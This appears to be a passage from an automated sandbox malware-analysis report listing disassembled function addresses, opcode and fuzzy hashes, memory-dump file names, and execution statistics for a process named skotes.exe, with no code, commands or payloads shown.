Opcode ID: 948e34d511bf09988659feb2fe9c9c966cae26901979bae0c8d1da015b6c29e9
Instruction ID: 47b31fda9c1fe9131d027ccf413fab71f031f6443e37d172c070c717dd247a3c
Opcode Fuzzy Hash: 948e34d511bf09988659feb2fe9c9c966cae26901979bae0c8d1da015b6c29e9
Instruction Fuzzy Hash: 11D0223290203CA78A222B89EC008BDBB588F40B643014126E90D53120CF50BCC07BD2

Function 00F64DE0 Relevance: .7, Instructions: 701COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1849527543.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1849511119.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849527543.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849588698.0000000000FC9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849606165.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849625080.0000000000FD7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849719342.0000000001139000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849736483.000000000113C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849753178.000000000114B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849753178.0000000001158000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849783740.000000000115A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849797104.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849810830.000000000115C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849826204.000000000115F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849839876.0000000001160000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849853953.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849872521.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849889620.0000000001171000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849903660.0000000001172000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849918130.0000000001173000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849936867.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849951682.000000000118D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849967558.0000000001194000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849982392.000000000119E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850007400.00000000011C4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850027159.00000000011C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850046839.00000000011C6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850068125.00000000011CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850087065.00000000011CD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850122696.00000000011D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850143508.00000000011D5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850164141.00000000011DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850188775.00000000011E1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850214649.00000000011E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850248657.00000000011EC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850270505.00000000011F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850296240.00000000011F8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850321794.00000000011FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850342222.0000000001203000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850359936.0000000001205000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850382530.0000000001215000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850401380.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850401380.0000000001244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850453459.0000000001270000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850471219.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850532750.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850551918.0000000001279000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850571435.0000000001287000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850590292.0000000001289000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a288ba9425b1e0675d4c1a4b7c309044fc7210f48c2e8a11584c5becf56d8827
Instruction ID: 4d3fa24bf5860600d737680634c111ef8f1e321708c036ec1a1996d45a7ec049
Opcode Fuzzy Hash: a288ba9425b1e0675d4c1a4b7c309044fc7210f48c2e8a11584c5becf56d8827
Instruction Fuzzy Hash: 5E2260B3F515144BDB0CCB9DDCA27EDB2E3AFD8218B0E803DA40AE3345EA79D9159644

Function 00F64B30 Relevance: .2, Instructions: 230COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1849527543.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1849511119.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849527543.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849588698.0000000000FC9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849606165.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849625080.0000000000FD7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849719342.0000000001139000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849736483.000000000113C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849753178.000000000114B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849753178.0000000001158000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849783740.000000000115A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849797104.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849810830.000000000115C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849826204.000000000115F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849839876.0000000001160000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849853953.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849872521.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849889620.0000000001171000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849903660.0000000001172000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849918130.0000000001173000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849936867.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849951682.000000000118D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849967558.0000000001194000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849982392.000000000119E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850007400.00000000011C4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850027159.00000000011C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850046839.00000000011C6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850068125.00000000011CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850087065.00000000011CD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850122696.00000000011D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850143508.00000000011D5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850164141.00000000011DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850188775.00000000011E1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850214649.00000000011E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850248657.00000000011EC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850270505.00000000011F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850296240.00000000011F8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850321794.00000000011FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850342222.0000000001203000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850359936.0000000001205000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850382530.0000000001215000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850401380.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850401380.0000000001244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850453459.0000000001270000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850471219.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850532750.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850551918.0000000001279000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850571435.0000000001287000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850590292.0000000001289000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8cd170ada9df8754091f63840a4eb46313d3365d7520dd99a31f51ed493e4959
Instruction ID: 09fd3da0a8f13b1dd6a7f45a7fe43780cc08cb2431a20409ab0da52196ed0bf2
Opcode Fuzzy Hash: 8cd170ada9df8754091f63840a4eb46313d3365d7520dd99a31f51ed493e4959
Instruction Fuzzy Hash: 24813070E0024A8FEB15DF68D880BEEBBF1FB5A310F140269C850A7752C735A945EBA0

Function 00FA8860 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1849527543.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1849511119.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849527543.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849588698.0000000000FC9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849606165.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849625080.0000000000FD7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849719342.0000000001139000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849736483.000000000113C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849753178.000000000114B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849753178.0000000001158000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849783740.000000000115A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849797104.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849810830.000000000115C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849826204.000000000115F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849839876.0000000001160000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849853953.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849872521.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849889620.0000000001171000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849903660.0000000001172000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849918130.0000000001173000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849936867.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849951682.000000000118D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849967558.0000000001194000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849982392.000000000119E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850007400.00000000011C4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850027159.00000000011C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850046839.00000000011C6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850068125.00000000011CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850087065.00000000011CD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850122696.00000000011D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850143508.00000000011D5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850164141.00000000011DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850188775.00000000011E1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850214649.00000000011E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850248657.00000000011EC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850270505.00000000011F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850296240.00000000011F8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850321794.00000000011FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850342222.0000000001203000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850359936.0000000001205000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850382530.0000000001215000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850401380.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850401380.0000000001244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850453459.0000000001270000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850471219.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850532750.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850551918.0000000001279000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850571435.0000000001287000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850590292.0000000001289000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 2d1bcbdc920bb8ba78f43a3e32dc7bad5fe0d485785178f7026cbaa16cd68a5f
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: A3115EF7A0118143E604863DC8B86BBE795EBC73717AD4379C0414B748CEAAD843B500

Function 00F9A302 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1849527543.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1849511119.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849527543.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849588698.0000000000FC9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849606165.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849625080.0000000000FD7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849719342.0000000001139000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849736483.000000000113C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849753178.000000000114B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849753178.0000000001158000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849783740.000000000115A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849797104.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849810830.000000000115C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849826204.000000000115F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849839876.0000000001160000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849853953.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849872521.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849889620.0000000001171000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849903660.0000000001172000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849918130.0000000001173000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849936867.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849951682.000000000118D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849967558.0000000001194000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849982392.000000000119E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850007400.00000000011C4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850027159.00000000011C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850046839.00000000011C6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850068125.00000000011CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850087065.00000000011CD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850122696.00000000011D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850143508.00000000011D5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850164141.00000000011DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850188775.00000000011E1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850214649.00000000011E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850248657.00000000011EC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850270505.00000000011F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850296240.00000000011F8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850321794.00000000011FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850342222.0000000001203000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850359936.0000000001205000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850382530.0000000001215000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850401380.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850401380.0000000001244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850453459.0000000001270000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850471219.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850532750.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850551918.0000000001279000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850571435.0000000001287000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850590292.0000000001289000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
Instruction ID: 209ec4d145332aafed4e36de9a3eaa05138814a71b48bce704450507b1e60fb4
Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
Instruction Fuzzy Hash: E0E08C32921228EBCB15DF98D908D8AF3ECEB49B10B650096F901D3150C274DE00D7D0

Function 00F62EC0 Relevance: 6.3, APIs: 4, Instructions: 272COMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 00F62F5F
__Mtx_unlock.LIBCPMT ref: 00F62FCC
__Mtx_unlock.LIBCPMT ref: 00F630F5
__Mtx_unlock.LIBCPMT ref: 00F6319B

Memory Dump Source

Source File: 00000000.00000002.1849527543.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1849511119.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849527543.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849588698.0000000000FC9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849606165.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849625080.0000000000FD7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849719342.0000000001139000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849736483.000000000113C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849753178.000000000114B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849753178.0000000001158000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849783740.000000000115A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849797104.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849810830.000000000115C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849826204.000000000115F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849839876.0000000001160000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849853953.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849872521.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849889620.0000000001171000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849903660.0000000001172000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849918130.0000000001173000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849936867.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849951682.000000000118D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849967558.0000000001194000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849982392.000000000119E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850007400.00000000011C4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850027159.00000000011C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850046839.00000000011C6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850068125.00000000011CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850087065.00000000011CD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850122696.00000000011D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850143508.00000000011D5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850164141.00000000011DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850188775.00000000011E1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850214649.00000000011E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850248657.00000000011EC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850270505.00000000011F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850296240.00000000011F8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850321794.00000000011FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850342222.0000000001203000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850359936.0000000001205000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850382530.0000000001215000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850401380.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850401380.0000000001244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850453459.0000000001270000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850471219.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850532750.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850551918.0000000001279000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850571435.0000000001287000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850590292.0000000001289000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_file.jbxd

Yara matches

Similarity

API ID: Mtx_unlock
String ID:
API String ID: 1418687624-0
Opcode ID: 48348570703014cbd6a8e059da6156916122c098e4fdee0bf2cbafcd35b60240
Instruction ID: 6670f70d005bbcb21539b56faede868ac45f87f86fd033c7a1ec28b64ba32ee9
Opcode Fuzzy Hash: 48348570703014cbd6a8e059da6156916122c098e4fdee0bf2cbafcd35b60240
Instruction Fuzzy Hash: 81A1D3B1E01605AFDB10DF64CD44B5AB7B8FF15324F14812AE81AD7641EB35EA04EBD2

Analysis Process: skotes.exePID: 6876, Parent PID: 5232COMMON

Execution Graph

Execution Coverage:	0.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	602
Total number of Limit Nodes:	4

Executed Functions

Function 0082652B Relevance: 1.5, APIs: 1, Instructions: 24
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(?,?,0082652A,?,?,?,?,?,00827661), ref: 00826567

Memory Dump Source

Source File: 00000001.00000002.1870379278.00000000007F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 007F0000, based on PE: true

Associated: 00000001.00000002.1870363907.00000000007F0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870379278.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870436463.0000000000859000.00000004.00000001.01000000.00000007.sdmpDownload File
